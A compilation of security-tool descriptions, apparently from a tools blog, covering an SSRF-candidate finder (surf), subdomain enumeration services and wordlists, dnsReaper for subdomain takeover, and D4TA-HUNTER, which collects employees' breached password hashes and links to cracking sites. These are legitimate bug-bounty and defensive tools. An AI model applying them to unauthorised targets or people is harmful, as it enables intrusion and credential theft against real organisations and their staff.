surf allows you to filter a list of hosts, returning a list of viable SSRF candidates. It does this by sending a HTTP request from your machine to each host, collecting all the hosts that did not respond, and then filtering them into a list of externally facing and internally facing hosts.

You can then attempt these hosts wherever an SSRF vulnerability may be present. Due to most SSRF filters only focusing on internal or restricted IP ranges, you'll be pleasantly surprised when you get SSRF on an external IP that is not accessible via HTTP(s) from your machine.

Often you will find that large companies with cloud environments will have external IPs for internal web apps. Traditional SSRF filters will not capture this unless these hosts are specifically added to a blacklist (which they usually never are). This is why this technique can be so powerful.


Installation

This tool requires go 1.19 or above as we rely on httpx to do the HTTP probing.

It can be installed with the following command:

go install github.com/assetnote/surf/cmd/surf@latest

Usage

Consider that you have subdomains for bigcorp.com inside a file named bigcorp.txt, and you want to find all the SSRF candidates for these subdomains. Here are some examples:

# find all ssrf candidates (including external IP addresses via HTTP probing)
surf -l bigcorp.txt
# find all ssrf candidates (including external IP addresses via HTTP probing) with timeout and concurrency settings
surf -l bigcorp.txt -t 10 -c 200
# find all ssrf candidates (including external IP addresses via HTTP probing), and just print all hosts
surf -l bigcorp.txt -d
# find all hosts that point to an internal/private IP address (no HTTP probing)
surf -l bigcorp.txt -x

The full list of settings can be found below:

❯ surf -h

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•” β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘
β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•šβ•β•

by shubs @ assetnote

Usage: surf [--hosts FILE] [--concurrency CONCURRENCY] [--timeout SECONDS] [--retries RETRIES] [--disablehttpx] [--disableanalysis]

Options:
--hosts FILE, -l FILE
List of assets (hosts or subdomains)
--concurrency CONCURRENCY, -c CONCURRENCY
Threads (passed down to httpx) - default 100 [default: 100]
--timeout SECONDS, -t SECONDS
Timeout in seconds (passed down to httpx) - default 3 [default: 3]
--retries RETRIES, -r RETRIES
Retries on failure (passed down to httpx) - default 2 [default: 2]
--disablehttpx, -x Disable httpx and only output list of hosts that resolve to an internal IP address - default false [default: false]
--disableanalysis, -d
Disable analysis and only output list of hosts - default false [default: false]
--help, -h display this help and exit

Output

When running surf, it will print out the SSRF candidates to stdout, but it will also save two files inside the folder it is ran from:

  • external-{timestamp}.txt - Externally resolving, but unable to send HTTP requests to from your machine
  • internal-{timestamp}.txt - Internally resolving, and obviously unable to send HTTP requests from your machine

These two files will contain the list of hosts that are ideal SSRF candidates to try on your target. The external target list has higher chances of being viable than the internal list.

Acknowledgements

Under the hood, this tool leverages httpx to do the HTTP probing. It captures errors returned from httpx, and then performs some basic analysis to determine the most viable candidates for SSRF.

This tool was created as a result of a live hacking event for HackerOne (H1-4420 2023).



Columbus-Server - API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features

By: Zion3R


Columbus Project is an API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features.

Columbus returned 638 subdomains of tesla.com in 0.231 sec.


Usage

By default Columbus returns only the subdomains in a JSON string array:

curl 'https://columbus.elmasy.com/lookup/github.com'

But we think of the bash lovers, so if you don't want to mess with JSON and a newline separated list is your wish, then include the Accept: text/plain header.

DOMAIN="github.com"

curl -s -H "Accept: text/plain" "https://columbus.elmasy.com/lookup/$DOMAIN" | \
while read SUB
do
if [[ "$SUB" == "" ]]
then
HOST="$DOMAIN"
else
HOST="${SUB}.${DOMAIN}"
fi
echo "$HOST"
done

For more, check the features or the API documentation.

Entries

Currently, entries are got from Certificate Transparency.

Command Line

Usage of columbus-server:
-check
Check for updates.
-config string
Path to the config file.
-version
Print version informations.

-check: Check the lates version on GitHub. Prints up-to-date and returns 0 if no update required. Prints the latest tag (eg.: v0.9.1) and returns 1 if new release available. In case of error, prints the error message and returns 2.

Build

git clone https://github.com/elmasy-com/columbus-server
make build

Install

Create a new user:

adduser --system --no-create-home --disabled-login columbus-server

Create a new group:

addgroup --system columbus

Add the new user to the new group:

usermod -aG columbus columbus-server

Copy the binary to /usr/bin/columbus-server.

Make it executable:

chmod +x /usr/bin/columbus-server

Create a directory:

mkdir /etc/columbus

Copy the config file to /etc/columbus/server.conf.

Set the permission to 0600.

chmod -R 0600 /etc/columbus

Set the owner of the config file:

chown -R columbus-server:columbus /etc/columbus

Install the service file (eg.: /etc/systemd/system/columbus-server.service).

cp columbus-server.service /etc/systemd/system/

Reload systemd:

systemctl daemon-reload

Start columbus:

systemctl start columbus-server

If you want to columbus start automatically:

systemctl enable columbus-server


Probable_Subdomains - Subdomains Analysis And Generation Tool. Reveal The Hidden!


Online tool: https://weakpass.com/generate/domains

TL;DR

During bug bounties, penetrations tests, red teams exercises, and other great activities, there is always a room when you need to launch amass, subfinder, sublister, or any other tool to find subdomains you can use to break through - like test.google.com, dev.admin.paypal.com or staging.ceo.twitter.com. Within this repository, you will be able to find out the answers to the following questions:

  1. What are the most popular subdomains?
  2. What are the most common words in multilevel subdomains on different levels?
  3. What are the most used words in subdomains?

And, of course, wordlists for all of the questions above!


Methodology

As sources, I used lists of subdomains from public bugbounty programs, that were collected by chaos.projectdiscovery.io, bounty-targets-data or that just had responsible disclosure programs with a total number of 4095 domains! If subdomains appear more than in 5-10 different scopes, they will be put in a certain list. For example, if dev.stg appears both in *.google.com and *.twitter.com, it will have a frequency of 2. It does not matter how often dev.stg appears in *.google.com. That's all - nothing more, nothing less< /strong>.

You can find complete list of sources here

Lists

Subdomains

In these lists you will find most popular subdomains as is.

Name Words count Size
subdomains.txt.gz 21901389 501MB
subdomains_top100.txt 100 706B
subdomains_top1000.txt 1000 7.2KB
subdomains_top10000.txt 10000 70KB

Subdomain levels

In these lists, you will find the most popular words from subdomains split by levels. F.E - dev.stg subdomain will be split into two words dev and stg. dev will have level = 2, stg - level = 1. You can use these wordlists for combinatory attacks for subdomain searches. There are several types of level.txt wordlists that follow the idea of subdomains.

Name Words count Size
level_1.txt.gz 8096054 153MB
level_2.txt.gz 7556074 106MB
level_3.txt.gz 1490999 18MB
level_4.txt.gz 205969 3.2MB
level_5.txt.gz 71716 849KB
level_1_top100.txt 100 633B
level_1_top1000.txt 1000 6.6K
level_2_top100.txt 100 550B
level_2_top1000.txt 1000 5.6KB
level_3_top100.txt 100 531B
level_3_top1000.txt 1000 5.1KB
level_4_top100.txt 100 525B
level_4_top1000.txt 1000 5.0KB
level_5_top100.txt 100 449B
level_5_top1000.txt 1000 5.0KB

Popular splitted subdomains

In these lists, you will find the most popular splitted words from subdomains on all levels. For example - dev.stg subdomain will be splitted in two words dev and stg.

Name Words count Size
words.txt.gz 17229401 278MB
words_top100.txt 100 597B
words_top1000.txt 1000 5.5KB
words_top10000.txt 10000 62KB

Google Drive

You can download all the files from Google Drive

Attributions

Thanks!



D4TA-HUNTER - GUI Osint Framework With Kali Linux


D4TA-HUNTER is a tool created in order to automate the collection of information about the employees of a company that is going to be audited for ethical hacking.

In addition, in this tool we can find in the "search company" section by inserting the domain of a company, emails of employees, subdomains and IP's of servers.


GET API KEY

Register on https://rapidapi.com/rohan-patra/api/breachdirectory

Install

git clone https://github.com/micro-joan/D4TA-HUNTER
cd D4TA-HUNTER/
chmod +x run.sh
./run.sh

After executing the application launcher you need to have all the components installed, the launcher will check one by one, and in the case of not having any component installed it will show you the statement that you must enter to install it:



Use

First you must have a free or paid api-key from BreachDirectory.org, if you don't have one and do a search D4TA-HUNTER provides you with a guide on how to get one.

Once you have the api-key you will be able to search for emails, with the advantage of showing you a list of all the password hashes ready for you to copy and paste into one of the online resources provided by D4TA-HUNTER to crack passwords 100 % free.


Β 

You can also insert a domain of a company and D4TA-HUNTER will search for employee emails, subdomains that may be of interest together with IP's of machines found:


Β 

Apis and tools

Service Functions Status
BreachDirectory.org Email, phone or nick leaks
βœ…
ο”‘
(free plan)
TheHarvester Domains and emails of company
βœ…
Free
Kalitorify Tor search
βœ…
Free


Video Demo:Β https://darkhacking.es/d4ta-hunter-framework-osint-para-kali-linux
My website:Β https://microjoan.com
My blog:Β https://darkhacking.es/
Buy me a coffee:Β https://www.buymeacoffee.com/microjoan

DISCLAIMER

ThisΒ toolkitΒ contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using,or in any other way utilizing this in a wrong way.

This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here!




dnsReaper - Subdomain Takeover Tool For Attackers, Bug Bounty Hunters And The Blue Team!


DNS Reaper is yet another sub-domain takeover tool, but with an emphasis on accuracy, speed and the number of signatures in our arsenal!

We can scan around 50 subdomains per second, testing each one with over 50 takeover signatures. This means most organisations can scan their entire DNS estate in less than 10 seconds.


You can use DNS Reaper as an attacker or bug hunter!

You can run it by providing a list of domains in a file, or a single domain on the command line. DNS Reaper will then scan the domains with all of its signatures, producing a CSV file.

You can use DNS Reaper as a defender!

You can run it by letting it fetch your DNS records for you! Yes that's right, you can run it with credentials and test all your domain config quickly and easily. DNS Reaper will connect to the DNS provider and fetch all your records, and then test them.

We currently support AWS Route53, Cloudflare, and Azure. Documentation on adding your own provider can be found here

You can use DNS Reaper as a DevSecOps Pro!

Punk Security are a DevSecOps company, and DNS Reaper has its roots in modern security best practice.

You can run DNS Reaper in a pipeline, feeding it a list of domains that you intend to provision, and it will exit Non-Zero if it detects a takeover is possible. You can prevent takeovers before they are even possible!

Usage

To run DNS Reaper, you can use the docker image or run it with python 3.10.

Findings are returned in the output and more detail is provided in a local "results.csv" file. We also support json output as an option.

Run it with docker

docker run punksecurity/dnsreaper --help

Run it with python

pip install -r requirements.txt
python main.py --help

Common commands

  • Scan AWS account:

    docker run punksecurity/dnsreaper aws --aws-access-key-id <key> --aws-access-key-secret <secret>

    For more information, see the documentation for the aws provider

  • Scan all domains from file:

    docker run -v $(pwd):/etc/dnsreaper punksecurity/dnsreaper file --filename /etc/dnsreaper/<filename>

  • Scan single domain

    docker run punksecurity/dnsreaper single --domain <domain>

  • Scan single domain and output to stdout:

    You should either redirect the stderr output or save stdout output with >

    docker run punksecurity/dnsreaper single --domain <domain> --out stdout --out-format=json > output

Full usage

          ____              __   _____                      _ __
/ __ \__ ______ / /__/ ___/___ _______ _______(_) /___ __
/ /_/ / / / / __ \/ //_/\__ \/ _ \/ ___/ / / / ___/ / __/ / / /
/ ____/ /_/ / / / / ,< ___/ / __/ /__/ /_/ / / / / /_/ /_/ /
/_/ \__,_/_/ /_/_/|_|/____/\___/\___/\__,_/_/ /_/\__/\__, /
PRESENTS /____/
DNS Reaper ☠️

Scan all your DNS records for subdomain takeovers!

usage:
.\main.py provider [options]

output:
findings output to screen and (by default) results.csv

help:
.\main.py --help

providers:
> aws - Scan multiple domains by fetching them from AWS Route53
> azure - Scan multiple domains by fetching t hem from Azure DNS services
> bind - Read domains from a dns BIND zone file, or path to multiple
> cloudflare - Scan multiple domains by fetching them from Cloudflare
> file - Read domains from a file, one per line
> single - Scan a single domain by providing a domain on the commandline
> zonetransfer - Scan multiple domains by fetching records via DNS zone transfer

positional arguments:
{aws,azure,bind,cloudflare,file,single,zonetransfer}

options:
-h, --help Show this help message and exit
--out OUT Output file (default: results) - use 'stdout' to stream out
--out-format {csv,json}
--resolver RESOLVER
Provide a custom DNS resolver (or multiple seperated by commas)
--parallelism PARALLELISM
Number of domains to test in parallel - too high and you may see odd DNS results (default: 30)
--disable-probable Do not check for probable conditions
--enable-unlikely Check for more conditions, but with a high false positive rate
--signature SIGNATURE
Only scan with this signature (multiple accepted)
--exclude-signature EXCLUDE_SIGNATURE
Do not scan with this signature (multiple accepted)
--pipeline Exit Non-Zero on detection (used to fail a pipeline)
-v, --verbose -v for verbose, -vv for extra verbose
--nocolour Turns off coloured text

aws:
Scan multiple domains by fetching them from AWS Route53

--aws-access-key-id AWS_ACCESS_KEY_ID
Optional
--aws-access-key-secret AWS_ACCESS_KEY_SECRET
Optional

azure:
Scan multiple domains by fetching them from Azure DNS services

--az-subscription-id AZ_SUBSCRIPTION_ID
Required
--az-tenant-id AZ_TENANT_ID
Required
--az-client-id AZ_CLIENT_ID
Required
--az-client-secret AZ_CLIENT_SECRET
Required

bind:
Read domains from a dns BIND zone file, or path to multiple

--bind-zone-file BIND_ZONE_FILE
Required

cloudflare:
Scan multiple domains by fetching them from Cloudflare

--cloudflare-token CLOUDFLARE_TOKEN
Required

file:
Read domains from a file, one per line

--filename FILENAME Required

single:
Scan a single domain by providing a domain on the commandline

--domain DOMAIN Required

zonetransfer:
Scan multiple domains by fetching records via DNS zone transfer

--zonetransfer-nameserver ZONE TRANSFER_NAMESERVER
Required
--zonetransfer-domain ZONETRANSFER_DOMAIN
Required


❌